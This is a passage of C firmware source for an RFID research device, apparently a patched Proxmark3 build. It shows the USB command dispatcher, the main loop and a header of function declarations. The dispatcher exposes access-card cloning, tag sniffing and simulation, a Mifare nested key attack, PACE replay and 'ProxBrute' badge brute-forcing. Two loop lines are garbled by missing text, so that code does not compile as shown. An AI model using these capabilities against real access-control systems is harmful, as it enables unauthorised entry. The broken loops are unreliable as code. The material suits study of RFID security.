0x8, /* ---X | 57% of maximum current detected */ 820 | 0xC, /* --XX | 71% of maximum current detected */ 821 | 0xE, /* -XXX | 86% of maximum current detected */ 822 | 0xF, /* XXXX | 100% of maximum current detected */ 823 | }; 824 | static const int LIGHT_LEN = sizeof(LIGHT_SCHEME)/sizeof(LIGHT_SCHEME[0]); 825 | 826 | void ListenReaderField(int limit) 827 | { 828 | int lf_av, lf_av_new, lf_baseline= 0, lf_max; 829 | int hf_av, hf_av_new, hf_baseline= 0, hf_max; 830 | int mode=1, display_val, display_max, i; 831 | 832 | #define LF_ONLY 1 833 | #define HF_ONLY 2 834 | #define REPORT_CHANGE 10 // report new values only if they have changed at least by REPORT_CHANGE 835 | 836 | 837 | // switch off FPGA - we don't want to measure our own signal 838 | FpgaDownloadAndGo(FPGA_BITSTREAM_HF); 839 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 840 | 841 | LEDsoff(); 842 | 843 | lf_av = lf_max = AvgAdc(ADC_CHAN_LF); 844 | 845 | if(limit != HF_ONLY) { 846 | Dbprintf("LF 125/134kHz Baseline: %dmV", (MAX_ADC_LF_VOLTAGE * lf_av) >> 10); 847 | lf_baseline = lf_av; 848 | } 849 | 850 | hf_av = hf_max = AvgAdc(ADC_CHAN_HF); 851 | 852 | if (limit != LF_ONLY) { 853 | Dbprintf("HF 13.56MHz Baseline: %dmV", (MAX_ADC_HF_VOLTAGE * hf_av) >> 10); 854 | hf_baseline = hf_av; 855 | } 856 | 857 | for(;;) { 858 | if (BUTTON_PRESS()) { 859 | SpinDelay(500); 860 | switch (mode) { 861 | case 1: 862 | mode=2; 863 | DbpString("Signal Strength Mode"); 864 | break; 865 | case 2: 866 | default: 867 | DbpString("Stopped"); 868 | LEDsoff(); 869 | return; 870 | break; 871 | } 872 | } 873 | WDT_HIT(); 874 | 875 | if (limit != HF_ONLY) { 876 | if(mode == 1) { 877 | if (ABS(lf_av - lf_baseline) > REPORT_CHANGE) 878 | LED_D_ON(); 879 | else 880 | LED_D_OFF(); 881 | } 882 | 883 | lf_av_new = AvgAdc(ADC_CHAN_LF); 884 | // see if there's a significant change 885 | if(ABS(lf_av - lf_av_new) > REPORT_CHANGE) { 886 | Dbprintf("LF 125/134kHz Field Change: %5dmV", (MAX_ADC_LF_VOLTAGE * lf_av_new) >> 10); 887 | lf_av = lf_av_new; 888 | if (lf_av > lf_max) 889 | lf_max = lf_av; 890 | } 891 | } 892 | 893 | if (limit != LF_ONLY) { 894 | if (mode == 1){ 895 | if (ABS(hf_av - hf_baseline) > REPORT_CHANGE) 896 | LED_B_ON(); 897 | else 898 | LED_B_OFF(); 899 | } 900 | 901 | hf_av_new = AvgAdc(ADC_CHAN_HF); 902 | // see if there's a significant change 903 | if(ABS(hf_av - hf_av_new) > REPORT_CHANGE) { 904 | Dbprintf("HF 13.56MHz Field Change: %5dmV", (MAX_ADC_HF_VOLTAGE * hf_av_new) >> 10); 905 | hf_av = hf_av_new; 906 | if (hf_av > hf_max) 907 | hf_max = hf_av; 908 | } 909 | } 910 | 911 | if(mode == 2) { 912 | if (limit == LF_ONLY) { 913 | display_val = lf_av; 914 | display_max = lf_max; 915 | } else if (limit == HF_ONLY) { 916 | display_val = hf_av; 917 | display_max = hf_max; 918 | } else { /* Pick one at random */ 919 | if( (hf_max - hf_baseline) > (lf_max - lf_baseline) ) { 920 | display_val = hf_av; 921 | display_max = hf_max; 922 | } else { 923 | display_val = lf_av; 924 | display_max = lf_max; 925 | } 926 | } 927 | for (i=0; i= ((display_max/LIGHT_LEN)*i) && display_val <= ((display_max/LIGHT_LEN)*(i+1))) { 929 | if (LIGHT_SCHEME[i] & 0x1) LED_C_ON(); else LED_C_OFF(); 930 | if (LIGHT_SCHEME[i] & 0x2) LED_A_ON(); else LED_A_OFF(); 931 | if (LIGHT_SCHEME[i] & 0x4) LED_B_ON(); else LED_B_OFF(); 932 | if (LIGHT_SCHEME[i] & 0x8) LED_D_ON(); else LED_D_OFF(); 933 | break; 934 | } 935 | } 936 | } 937 | } 938 | } 939 | 940 | void UsbPacketReceived(uint8_t *packet, int len) 941 | { 942 | UsbCommand *c = (UsbCommand *)packet; 943 | 944 | // Dbprintf("received %d bytes, with command: 0x%04x and args: %d %d %d",len,c->cmd,c->arg[0],c->arg[1],c->arg[2]); 945 | 946 | switch(c->cmd) { 947 | #ifdef WITH_LF 948 | case CMD_SET_LF_SAMPLING_CONFIG: 949 | setSamplingConfig((sample_config *) c->d.asBytes); 950 | break; 951 | case CMD_ACQUIRE_RAW_ADC_SAMPLES_125K: 952 | cmd_send(CMD_ACK,SampleLF(c->arg[0]),0,0,0,0); 953 | break; 954 | case CMD_MOD_THEN_ACQUIRE_RAW_ADC_SAMPLES_125K: 955 | ModThenAcquireRawAdcSamples125k(c->arg[0],c->arg[1],c->arg[2],c->d.asBytes); 956 | break; 957 | case CMD_LF_SNOOP_RAW_ADC_SAMPLES: 958 | cmd_send(CMD_ACK,SnoopLF(),0,0,0,0); 959 | break; 960 | case CMD_HID_DEMOD_FSK: 961 | CmdHIDdemodFSK(c->arg[0], 0, 0, 1); 962 | break; 963 | case CMD_HID_SIM_TAG: 964 | CmdHIDsimTAG(c->arg[0], c->arg[1], 1); 965 | break; 966 | case CMD_FSK_SIM_TAG: 967 | CmdFSKsimTAG(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 968 | break; 969 | case CMD_ASK_SIM_TAG: 970 | CmdASKsimTag(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 971 | break; 972 | case CMD_PSK_SIM_TAG: 973 | CmdPSKsimTag(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 974 | break; 975 | case CMD_HID_CLONE_TAG: 976 | CopyHIDtoT55x7(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes[0]); 977 | break; 978 | case CMD_IO_DEMOD_FSK: 979 | CmdIOdemodFSK(c->arg[0], 0, 0, 1); 980 | break; 981 | case CMD_IO_CLONE_TAG: 982 | CopyIOtoT55x7(c->arg[0], c->arg[1]); 983 | break; 984 | case CMD_EM410X_DEMOD: 985 | CmdEM410xdemod(c->arg[0], 0, 0, 1); 986 | break; 987 | case CMD_EM410X_WRITE_TAG: 988 | WriteEM410x(c->arg[0], c->arg[1], c->arg[2]); 989 | break; 990 | case CMD_READ_TI_TYPE: 991 | ReadTItag(); 992 | break; 993 | case CMD_WRITE_TI_TYPE: 994 | WriteTItag(c->arg[0],c->arg[1],c->arg[2]); 995 | break; 996 | case CMD_SIMULATE_TAG_125K: 997 | LED_A_ON(); 998 | SimulateTagLowFrequency(c->arg[0], c->arg[1], 1); 999 | LED_A_OFF(); 1000 | break; 1001 | case CMD_LF_SIMULATE_BIDIR: 1002 | SimulateTagLowFrequencyBidir(c->arg[0], c->arg[1]); 1003 | break; 1004 | case CMD_INDALA_CLONE_TAG: 1005 | CopyIndala64toT55x7(c->arg[0], c->arg[1]); 1006 | break; 1007 | case CMD_INDALA_CLONE_TAG_L: 1008 | CopyIndala224toT55x7(c->d.asDwords[0], c->d.asDwords[1], c->d.asDwords[2], c->d.asDwords[3], c->d.asDwords[4], c->d.asDwords[5], c->d.asDwords[6]); 1009 | break; 1010 | case CMD_T55XX_READ_BLOCK: 1011 | T55xxReadBlock(c->arg[0], c->arg[1], c->arg[2]); 1012 | break; 1013 | case CMD_T55XX_WRITE_BLOCK: 1014 | T55xxWriteBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes[0]); 1015 | break; 1016 | case CMD_T55XX_WAKEUP: 1017 | T55xxWakeUp(c->arg[0]); 1018 | break; 1019 | case CMD_T55XX_RESET_READ: 1020 | T55xxResetRead(); 1021 | break; 1022 | case CMD_PCF7931_READ: 1023 | ReadPCF7931(); 1024 | break; 1025 | case CMD_PCF7931_WRITE: 1026 | WritePCF7931(c->d.asBytes[0],c->d.asBytes[1],c->d.asBytes[2],c->d.asBytes[3],c->d.asBytes[4],c->d.asBytes[5],c->d.asBytes[6], c->d.asBytes[9], c->d.asBytes[7]-128,c->d.asBytes[8]-128, c->arg[0], c->arg[1], c->arg[2]); 1027 | break; 1028 | case CMD_EM4X_READ_WORD: 1029 | EM4xReadWord(c->arg[1], c->arg[2],c->d.asBytes[0]); 1030 | break; 1031 | case CMD_EM4X_WRITE_WORD: 1032 | EM4xWriteWord(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes[0]); 1033 | break; 1034 | case CMD_AWID_DEMOD_FSK: // Set realtime AWID demodulation 1035 | CmdAWIDdemodFSK(c->arg[0], 0, 0, 1); 1036 | break; 1037 | case CMD_VIKING_CLONE_TAG: 1038 | CopyVikingtoT55xx(c->arg[0], c->arg[1], c->arg[2]); 1039 | break; 1040 | #endif 1041 | 1042 | #ifdef WITH_HITAG 1043 | case CMD_SNOOP_HITAG: // Eavesdrop Hitag tag, args = type 1044 | SnoopHitag(c->arg[0]); 1045 | break; 1046 | case CMD_SIMULATE_HITAG: // Simulate Hitag tag, args = memory content 1047 | SimulateHitagTag((bool)c->arg[0],(byte_t*)c->d.asBytes); 1048 | break; 1049 | case CMD_READER_HITAG: // Reader for Hitag tags, args = type and function 1050 | ReaderHitag((hitag_function)c->arg[0],(hitag_data*)c->d.asBytes); 1051 | break; 1052 | case CMD_SIMULATE_HITAG_S:// Simulate Hitag s tag, args = memory content 1053 | SimulateHitagSTag((bool)c->arg[0],(byte_t*)c->d.asBytes); 1054 | break; 1055 | case CMD_TEST_HITAGS_TRACES:// Tests every challenge within the given file 1056 | check_challenges((bool)c->arg[0],(byte_t*)c->d.asBytes); 1057 | break; 1058 | case CMD_READ_HITAG_S://Reader for only Hitag S tags, args = key or challenge 1059 | ReadHitagS((hitag_function)c->arg[0],(hitag_data*)c->d.asBytes); 1060 | break; 1061 | case CMD_WR_HITAG_S://writer for Hitag tags args=data to write,page and key or challenge 1062 | WritePageHitagS((hitag_function)c->arg[0],(hitag_data*)c->d.asBytes,c->arg[2]); 1063 | break; 1064 | #endif 1065 | 1066 | #ifdef WITH_ISO15693 1067 | case CMD_ACQUIRE_RAW_ADC_SAMPLES_ISO_15693: 1068 | AcquireRawAdcSamplesIso15693(); 1069 | break; 1070 | case CMD_RECORD_RAW_ADC_SAMPLES_ISO_15693: 1071 | RecordRawAdcSamplesIso15693(); 1072 | break; 1073 | 1074 | case CMD_ISO_15693_COMMAND: 1075 | DirectTag15693Command(c->arg[0],c->arg[1],c->arg[2],c->d.asBytes); 1076 | break; 1077 | 1078 | case CMD_ISO_15693_FIND_AFI: 1079 | BruteforceIso15693Afi(c->arg[0]); 1080 | break; 1081 | 1082 | case CMD_ISO_15693_DEBUG: 1083 | SetDebugIso15693(c->arg[0]); 1084 | break; 1085 | 1086 | case CMD_READER_ISO_15693: 1087 | ReaderIso15693(c->arg[0]); 1088 | break; 1089 | case CMD_SIMTAG_ISO_15693: 1090 | SimTagIso15693(c->arg[0], c->d.asBytes); 1091 | break; 1092 | #endif 1093 | 1094 | #ifdef WITH_LEGICRF 1095 | case CMD_SIMULATE_TAG_LEGIC_RF: 1096 | LegicRfSimulate(c->arg[0], c->arg[1], c->arg[2]); 1097 | break; 1098 | 1099 | case CMD_WRITER_LEGIC_RF: 1100 | LegicRfWriter(c->arg[1], c->arg[0]); 1101 | break; 1102 | 1103 | case CMD_READER_LEGIC_RF: 1104 | LegicRfReader(c->arg[0], c->arg[1]); 1105 | break; 1106 | #endif 1107 | 1108 | #ifdef WITH_ISO14443b 1109 | case CMD_READ_SRI512_TAG: 1110 | ReadSTMemoryIso14443b(0x0F); 1111 | break; 1112 | case CMD_READ_SRIX4K_TAG: 1113 | ReadSTMemoryIso14443b(0x7F); 1114 | break; 1115 | case CMD_SNOOP_ISO_14443B: 1116 | SnoopIso14443b(); 1117 | break; 1118 | case CMD_SIMULATE_TAG_ISO_14443B: 1119 | SimulateIso14443bTag(); 1120 | break; 1121 | case CMD_ISO_14443B_COMMAND: 1122 | SendRawCommand14443B(c->arg[0],c->arg[1],c->arg[2],c->d.asBytes); 1123 | break; 1124 | #endif 1125 | 1126 | #ifdef WITH_ISO14443a 1127 | case CMD_SNOOP_ISO_14443a: 1128 | SnoopIso14443a(c->arg[0]); 1129 | break; 1130 | case CMD_READER_ISO_14443a: 1131 | ReaderIso14443a(c); 1132 | break; 1133 | case CMD_SIMULATE_TAG_ISO_14443a: 1134 | SimulateIso14443aTag(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); // ## Simulate iso14443a tag - pass tag type & UID 1135 | break; 1136 | 1137 | case CMD_EPA_PACE_COLLECT_NONCE: 1138 | EPA_PACE_Collect_Nonce(c); 1139 | break; 1140 | case CMD_EPA_PACE_REPLAY: 1141 | EPA_PACE_Replay(c); 1142 | break; 1143 | 1144 | case CMD_READER_MIFARE: 1145 | ReaderMifare(c->arg[0]); 1146 | break; 1147 | case CMD_MIFARE_READBL: 1148 | MifareReadBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1149 | break; 1150 | case CMD_MIFAREU_READBL: 1151 | MifareUReadBlock(c->arg[0],c->arg[1], c->d.asBytes); 1152 | break; 1153 | case CMD_MIFAREUC_AUTH: 1154 | MifareUC_Auth(c->arg[0],c->d.asBytes); 1155 | break; 1156 | case CMD_MIFAREU_READCARD: 1157 | MifareUReadCard(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1158 | break; 1159 | case CMD_MIFAREUC_SETPWD: 1160 | MifareUSetPwd(c->arg[0], c->d.asBytes); 1161 | break; 1162 | case CMD_MIFARE_READSC: 1163 | MifareReadSector(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1164 | break; 1165 | case CMD_MIFARE_WRITEBL: 1166 | MifareWriteBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1167 | break; 1168 | //case CMD_MIFAREU_WRITEBL_COMPAT: 1169 | //MifareUWriteBlockCompat(c->arg[0], c->d.asBytes); 1170 | //break; 1171 | case CMD_MIFAREU_WRITEBL: 1172 | MifareUWriteBlock(c->arg[0], c->arg[1], c->d.asBytes); 1173 | break; 1174 | case CMD_MIFARE_NESTED: 1175 | MifareNested(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1176 | break; 1177 | case CMD_MIFARE_CHKKEYS: 1178 | MifareChkKeys(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1179 | break; 1180 | case CMD_SIMULATE_MIFARE_CARD: 1181 | Mifare1ksim(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1182 | break; 1183 | 1184 | // emulator 1185 | case CMD_MIFARE_SET_DBGMODE: 1186 | MifareSetDbgLvl(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1187 | break; 1188 | case CMD_MIFARE_EML_MEMCLR: 1189 | MifareEMemClr(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1190 | break; 1191 | case CMD_MIFARE_EML_MEMSET: 1192 | MifareEMemSet(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1193 | break; 1194 | case CMD_MIFARE_EML_MEMGET: 1195 | MifareEMemGet(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1196 | break; 1197 | case CMD_MIFARE_EML_CARDLOAD: 1198 | MifareECardLoad(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1199 | break; 1200 | 1201 | // Work with "magic Chinese" card 1202 | case CMD_MIFARE_CSETBLOCK: 1203 | MifareCSetBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1204 | break; 1205 | case CMD_MIFARE_CGETBLOCK: 1206 | MifareCGetBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1207 | break; 1208 | case CMD_MIFARE_CIDENT: 1209 | MifareCIdent(); 1210 | break; 1211 | 1212 | // mifare sniffer 1213 | case CMD_MIFARE_SNIFFER: 1214 | SniffMifare(c->arg[0]); 1215 | break; 1216 | 1217 | #endif 1218 | 1219 | #ifdef WITH_ICLASS 1220 | // Makes use of ISO14443a FPGA Firmware 1221 | case CMD_SNOOP_ICLASS: 1222 | SnoopIClass(); 1223 | break; 1224 | case CMD_SIMULATE_TAG_ICLASS: 1225 | SimulateIClass(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 1226 | break; 1227 | case CMD_READER_ICLASS: 1228 | ReaderIClass(c->arg[0]); 1229 | break; 1230 | case CMD_READER_ICLASS_REPLAY: 1231 | ReaderIClass_Replay(c->arg[0], c->d.asBytes); 1232 | break; 1233 | case CMD_ICLASS_EML_MEMSET: 1234 | emlSet(c->d.asBytes,c->arg[0], c->arg[1]); 1235 | break; 1236 | case CMD_ICLASS_WRITEBLOCK: 1237 | iClass_WriteBlock(c->arg[0], c->d.asBytes); 1238 | break; 1239 | case CMD_ICLASS_READCHECK: // auth step 1 1240 | iClass_ReadCheck(c->arg[0], c->arg[1]); 1241 | break; 1242 | case CMD_ICLASS_READBLOCK: 1243 | iClass_ReadBlk(c->arg[0]); 1244 | break; 1245 | case CMD_ICLASS_AUTHENTICATION: //check 1246 | iClass_Authentication(c->d.asBytes); 1247 | break; 1248 | case CMD_ICLASS_DUMP: 1249 | iClass_Dump(c->arg[0], c->arg[1]); 1250 | break; 1251 | case CMD_ICLASS_CLONE: 1252 | iClass_Clone(c->arg[0], c->arg[1], c->d.asBytes); 1253 | break; 1254 | #endif 1255 | #ifdef WITH_HFSNOOP 1256 | case CMD_HF_SNIFFER: 1257 | HfSnoop(c->arg[0], c->arg[1]); 1258 | break; 1259 | #endif 1260 | 1261 | case CMD_BUFF_CLEAR: 1262 | BigBuf_Clear(); 1263 | break; 1264 | 1265 | case CMD_MEASURE_ANTENNA_TUNING: 1266 | MeasureAntennaTuning(c->arg[0]); 1267 | break; 1268 | 1269 | case CMD_MEASURE_ANTENNA_TUNING_HF: 1270 | MeasureAntennaTuningHf(); 1271 | break; 1272 | 1273 | case CMD_LISTEN_READER_FIELD: 1274 | ListenReaderField(c->arg[0]); 1275 | break; 1276 | 1277 | case CMD_FPGA_MAJOR_MODE_OFF: // ## FPGA Control 1278 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 1279 | SpinDelay(200); 1280 | LED_D_OFF(); // LED D indicates field ON or OFF 1281 | break; 1282 | 1283 | case CMD_DOWNLOAD_RAW_ADC_SAMPLES_125K: 1284 | 1285 | LED_B_ON(); 1286 | uint8_t *BigBuf = BigBuf_get_addr(); 1287 | for(size_t i=0; iarg[1]; i += USB_CMD_DATA_SIZE) { 1288 | size_t len = MIN((c->arg[1] - i),USB_CMD_DATA_SIZE); 1289 | cmd_send(CMD_DOWNLOADED_RAW_ADC_SAMPLES_125K,i,len,BigBuf_get_traceLen(),BigBuf+c->arg[0]+i,len); 1290 | } 1291 | // Trigger a finish downloading signal with an ACK frame 1292 | cmd_send(CMD_ACK,1,0,BigBuf_get_traceLen(),getSamplingConfig(),sizeof(sample_config)); 1293 | LED_B_OFF(); 1294 | break; 1295 | 1296 | case CMD_DOWNLOADED_SIM_SAMPLES_125K: { 1297 | uint8_t *b = BigBuf_get_addr(); 1298 | memcpy(b+c->arg[0], c->d.asBytes, USB_CMD_DATA_SIZE); 1299 | cmd_send(CMD_ACK,0,0,0,0,0); 1300 | break; 1301 | } 1302 | case CMD_READ_MEM: 1303 | ReadMem(c->arg[0]); 1304 | break; 1305 | 1306 | case CMD_SET_LF_DIVISOR: 1307 | FpgaDownloadAndGo(FPGA_BITSTREAM_LF); 1308 | FpgaSendCommand(FPGA_CMD_SET_DIVISOR, c->arg[0]); 1309 | break; 1310 | 1311 | case CMD_SET_ADC_MUX: 1312 | switch(c->arg[0]) { 1313 | case 0: SetAdcMuxFor(GPIO_MUXSEL_LOPKD); break; 1314 | case 1: SetAdcMuxFor(GPIO_MUXSEL_LORAW); break; 1315 | case 2: SetAdcMuxFor(GPIO_MUXSEL_HIPKD); break; 1316 | case 3: SetAdcMuxFor(GPIO_MUXSEL_HIRAW); break; 1317 | } 1318 | break; 1319 | 1320 | case CMD_VERSION: 1321 | SendVersion(); 1322 | break; 1323 | case CMD_STATUS: 1324 | SendStatus(); 1325 | break; 1326 | case CMD_PING: 1327 | cmd_send(CMD_ACK,0,0,0,0,0); 1328 | break; 1329 | #ifdef WITH_LCD 1330 | case CMD_LCD_RESET: 1331 | LCDReset(); 1332 | break; 1333 | case CMD_LCD: 1334 | LCDSend(c->arg[0]); 1335 | break; 1336 | #endif 1337 | case CMD_SETUP_WRITE: 1338 | case CMD_FINISH_WRITE: 1339 | case CMD_HARDWARE_RESET: 1340 | usb_disable(); 1341 | SpinDelay(1000); 1342 | SpinDelay(1000); 1343 | AT91C_BASE_RSTC->RSTC_RCR = RST_CONTROL_KEY | AT91C_RSTC_PROCRST; 1344 | for(;;) { 1345 | // We're going to reset, and the bootrom will take control. 1346 | } 1347 | break; 1348 | 1349 | case CMD_START_FLASH: 1350 | if(common_area.flags.bootrom_present) { 1351 | common_area.command = COMMON_AREA_COMMAND_ENTER_FLASH_MODE; 1352 | } 1353 | usb_disable(); 1354 | AT91C_BASE_RSTC->RSTC_RCR = RST_CONTROL_KEY | AT91C_RSTC_PROCRST; 1355 | for(;;); 1356 | break; 1357 | 1358 | case CMD_DEVICE_INFO: { 1359 | uint32_t dev_info = DEVICE_INFO_FLAG_OSIMAGE_PRESENT | DEVICE_INFO_FLAG_CURRENT_MODE_OS; 1360 | if(common_area.flags.bootrom_present) dev_info |= DEVICE_INFO_FLAG_BOOTROM_PRESENT; 1361 | cmd_send(CMD_DEVICE_INFO,dev_info,0,0,0,0); 1362 | break; 1363 | } 1364 | default: 1365 | Dbprintf("%s: 0x%04x","unknown command:",c->cmd); 1366 | break; 1367 | } 1368 | } 1369 | 1370 | void __attribute__((noreturn)) AppMain(void) 1371 | { 1372 | SpinDelay(100); 1373 | clear_trace(); 1374 | if(common_area.magic != COMMON_AREA_MAGIC || common_area.version != 1) { 1375 | /* Initialize common area */ 1376 | memset(&common_area, 0, sizeof(common_area)); 1377 | common_area.magic = COMMON_AREA_MAGIC; 1378 | common_area.version = 1; 1379 | } 1380 | common_area.flags.osimage_present = 1; 1381 | 1382 | LED_D_OFF(); 1383 | LED_C_OFF(); 1384 | LED_B_OFF(); 1385 | LED_A_OFF(); 1386 | 1387 | // Init USB device 1388 | usb_enable(); 1389 | 1390 | // The FPGA gets its clock from us from PCK0 output, so set that up. 1391 | AT91C_BASE_PIOA->PIO_BSR = GPIO_PCK0; 1392 | AT91C_BASE_PIOA->PIO_PDR = GPIO_PCK0; 1393 | AT91C_BASE_PMC->PMC_SCER = AT91C_PMC_PCK0; 1394 | // PCK0 is PLL clock / 4 = 96Mhz / 4 = 24Mhz 1395 | AT91C_BASE_PMC->PMC_PCKR[0] = AT91C_PMC_CSS_PLL_CLK | 1396 | AT91C_PMC_PRES_CLK_4; // 4 for 24Mhz pck0, 2 for 48 MHZ pck0 1397 | AT91C_BASE_PIOA->PIO_OER = GPIO_PCK0; 1398 | 1399 | // Reset SPI 1400 | AT91C_BASE_SPI->SPI_CR = AT91C_SPI_SWRST; 1401 | // Reset SSC 1402 | AT91C_BASE_SSC->SSC_CR = AT91C_SSC_SWRST; 1403 | 1404 | // Load the FPGA image, which we have stored in our flash. 1405 | // (the HF version by default) 1406 | FpgaDownloadAndGo(FPGA_BITSTREAM_HF); 1407 | 1408 | StartTickCount(); 1409 | 1410 | #ifdef WITH_LCD 1411 | LCDInit(); 1412 | #endif 1413 | 1414 | byte_t rx[sizeof(UsbCommand)]; 1415 | size_t rx_len; 1416 | 1417 | for(;;) { 1418 | if (usb_poll()) { 1419 | rx_len = usb_read(rx,sizeof(UsbCommand)); 1420 | if (rx_len) { 1421 | UsbPacketReceived(rx,rx_len); 1422 | } 1423 | } 1424 | WDT_HIT(); 1425 | 1426 | #ifdef WITH_LF 1427 | #ifndef WITH_ISO14443a_StandAlone 1428 | if (BUTTON_HELD(1000) > 0) 1429 | SamyRun(); 1430 | #endif 1431 | #endif 1432 | #ifdef WITH_ISO14443a 1433 | #ifdef WITH_ISO14443a_StandAlone 1434 | if (BUTTON_HELD(1000) > 0) 1435 | StandAloneMode14a(); 1436 | #endif 1437 | #endif 1438 | } 1439 | } 1440 | -------------------------------------------------------------------------------- /Updated Firmware and CDC Bootloader/patch/files from diff/patch/armsrc/apps.h: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Jonathan Westhues, Aug 2005 3 | // Gerhard de Koning Gans, April 2008, May 2011 4 | // 5 | // This code is licensed to you under the terms of the GNU GPL, version 2 or, 6 | // at your option, any later version. See the LICENSE.txt file for the text of 7 | // the license. 8 | //----------------------------------------------------------------------------- 9 | // Definitions internal to the app source. 10 | //----------------------------------------------------------------------------- 11 | 12 | #ifndef __APPS_H 13 | #define __APPS_H 14 | 15 | #include 16 | #include 17 | #include "common.h" 18 | #include "hitag2.h" 19 | #include "hitagS.h" 20 | #include "mifare.h" 21 | #include "../common/crc32.h" 22 | #include "BigBuf.h" 23 | #include "fpgaloader.h" 24 | 25 | extern const uint8_t OddByteParity[256]; 26 | extern int rsamples; // = 0; 27 | extern int tracing; // = TRUE; 28 | extern uint8_t trigger; 29 | 30 | // This may be used (sparingly) to declare a function to be copied to 31 | // and executed from RAM 32 | #define RAMFUNC __attribute((long_call, section(".ramfunc"))) 33 | 34 | /// appmain.h 35 | void ReadMem(int addr); 36 | void __attribute__((noreturn)) AppMain(void); 37 | void SamyRun(void); 38 | //void DbpIntegers(int a, int b, int c); 39 | void DbpString(char *str); 40 | void Dbprintf(const char *fmt, ...); 41 | void Dbhexdump(int len, uint8_t *d, bool bAsci); 42 | 43 | // ADC Vref = 3300mV, and an (10M+1M):1M voltage divider on the HF input can measure voltages up to 36300 mV 44 | #define MAX_ADC_HF_VOLTAGE 36300 45 | // ADC Vref = 3300mV, and an (10000k+240k):240k voltage divider on the LF input can measure voltages up to 140800 mV 46 | #define MAX_ADC_LF_VOLTAGE 140800 47 | int AvgAdc(int ch); 48 | 49 | void ToSendStuffBit(int b); 50 | void ToSendReset(void); 51 | void ListenReaderField(int limit); 52 | extern int ToSendMax; 53 | extern uint8_t ToSend[]; 54 | 55 | 56 | /// lfops.h 57 | extern uint8_t decimation; 58 | extern uint8_t bits_per_sample ; 59 | extern bool averaging; 60 | 61 | void AcquireRawAdcSamples125k(int divisor); 62 | void ModThenAcquireRawAdcSamples125k(uint32_t delay_off, uint32_t period_0, uint32_t period_1, uint8_t *command); 63 | void ReadTItag(void); 64 | void WriteTItag(uint32_t idhi, uint32_t idlo, uint16_t crc); 65 | 66 | void AcquireTiType(void); 67 | void AcquireRawBitsTI(void); 68 | void SimulateTagLowFrequency(int period, int gap, int ledcontrol); 69 | // ProxBrute - created this function so that i didnt mess with anything 70 | // important - needed to only send a couple tags then goto next 71 | void SimulateTagLowFrequencyProxBrute(int period, int gap, int ledcontrol); 72 | void CmdHIDsimTAGProxBrute(int hi, int lo, int ledcontrol); 73 | void SimulateTagLowFrequencyBidir(int divisor, int max_bitlen); 74 | void CmdHIDsimTAG(int hi, int lo, int ledcontrol); 75 | void CmdFSKsimTAG(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream); 76 | void CmdASKsimTag(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream); 77 | void CmdPSKsimTag(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream); 78 | void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol); 79 | void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol); // Realtime demodulation mode for AWID26 80 | void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol); 81 | void CmdIOdemodFSK(int findone, int *high, int *low, int ledcontrol); 82 | void CopyIOtoT55x7(uint32_t hi, uint32_t lo); // Clone an ioProx card to T5557/T5567 83 | void CopyHIDtoT55x7(uint32_t hi2, uint32_t hi, uint32_t lo, uint8_t longFMT); // Clone an HID card to T5557/T5567 84 | void CopyVikingtoT55xx(uint32_t block1, uint32_t block2, uint8_t Q5); 85 | void WriteEM410x(uint32_t card, uint32_t id_hi, uint32_t id_lo); 86 | void CopyIndala64toT55x7(uint32_t hi, uint32_t lo); // Clone Indala 64-bit tag by UID to T55x7 87 | void CopyIndala224toT55x7(uint32_t uid1, uint32_t uid2, uint32_t uid3, uint32_t uid4, uint32_t uid5, uint32_t uid6, uint32_t uid7); // Clone Indala 224-bit tag by UID to T55x7 88 | void T55xxResetRead(void); 89 | void T55xxWriteBlock(uint32_t Data, uint32_t Block, uint32_t Pwd, uint8_t PwdMode); 90 | void T55xxReadBlock(uint16_t arg0, uint8_t Block, uint32_t Pwd); 91 | void T55xxWakeUp(uint32_t Pwd); 92 | void TurnReadLFOn(); 93 | //void T55xxReadTrace(void); 94 | void EM4xReadWord(uint8_t Address, uint32_t Pwd, uint8_t PwdMode); 95 | void EM4xWriteWord(uint32_t Data, uint8_t Address, uint32_t Pwd, uint8_t PwdMode); 96 | 97 | /// iso14443.h 98 | void SimulateIso14443bTag(void); 99 | void AcquireRawAdcSamplesIso14443b(uint32_t parameter); 100 | void ReadSTMemoryIso14443b(uint32_t); 101 | void RAMFUNC SnoopIso14443b(void); 102 | void SendRawCommand14443B(uint32_t, uint32_t, uint8_t, uint8_t[]); 103 | 104 | /// iso14443a.h 105 | void RAMFUNC SnoopIso14443a(uint8_t param); 106 | void SimulateIso14443aTag(int tagType, int uid_1st, int uid_2nd, byte_t* data); 107 | void ReaderIso14443a(UsbCommand * c); 108 | // Also used in iclass.c 109 | bool RAMFUNC LogTrace(const uint8_t *btBytes, uint16_t len, uint32_t timestamp_start, uint32_t timestamp_end, uint8_t *parity, bool readerToTag); 110 | void GetParity(const uint8_t *pbtCmd, uint16_t len, uint8_t *parity); 